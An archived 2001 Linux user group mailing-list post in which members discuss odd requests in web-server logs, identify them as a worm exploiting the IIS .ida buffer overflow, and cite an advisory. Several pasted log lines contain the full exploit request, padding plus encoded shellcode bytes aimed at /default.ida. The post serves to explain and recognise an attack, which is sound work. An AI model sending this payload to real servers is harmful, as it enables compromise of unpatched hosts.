[KLUG Members] weird web stuff

Jamie McCarthy members@kalamazoolinux.org
Thu, 19 Jul 2001 14:03:56 -0400 (EDT)

Previous message: [KLUG Members] remote laptop over internet?
Next message: [KLUG Members] Meta Tags, Key Words and Search Engines.. Oh My!
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> Today I got found odd web requests on my home server (on DSL).  They were all
> from different IP addresses and they looked like this:
> 
> [19/Jul/2001:12:41:41 -0400] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
> HTTP/1.0" 400 335

> Anybody seen this before?  Should I start getting worried?  They were
> all within a half an hour and were VERY different IP address
> (24., 212., 4., 131.).

It's a worm attacking Microsoft servers.  Now's a good time to genuflect
in Linus's direction and give thanks you don't run an insecure closed-
source webserver, or you'd probably be toast right now (and helping
spread the worm to more toast hosts).

http://www.eeye.com/html/Research/Advisories/AL20010717.html

"The standard injection vector is an exploit that uses the .ida buffer
overflow to execute code (as SYSTEM) on vulnerable remote systems."
The worm appeared in the wild last Friday;  the patch for it was
released *yesterday* (boggle).

Here's my webserver getting hit too:

HTTP-1.0-access_log:211.237.178.105 - - [19/Jul/2001:15:01:53 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 332 "-" "-"

HTTP-1.0-access_log:206.111.21.14 - - [19/Jul/2001:16:28:27 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 332 "-" "-"

HTTP-1.0-access_log:64.48.249.11 - - [19/Jul/2001:17:27:40 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 332 "-" "-"

HTTP-1.0-access_log:64.166.52.243 - - [19/Jul/2001:17:38:40 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 332 "-" "-"

Previous message: [KLUG Members] remote laptop over internet?
Next message: [KLUG Members] Meta Tags, Key Words and Search Engines.. Oh My!
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]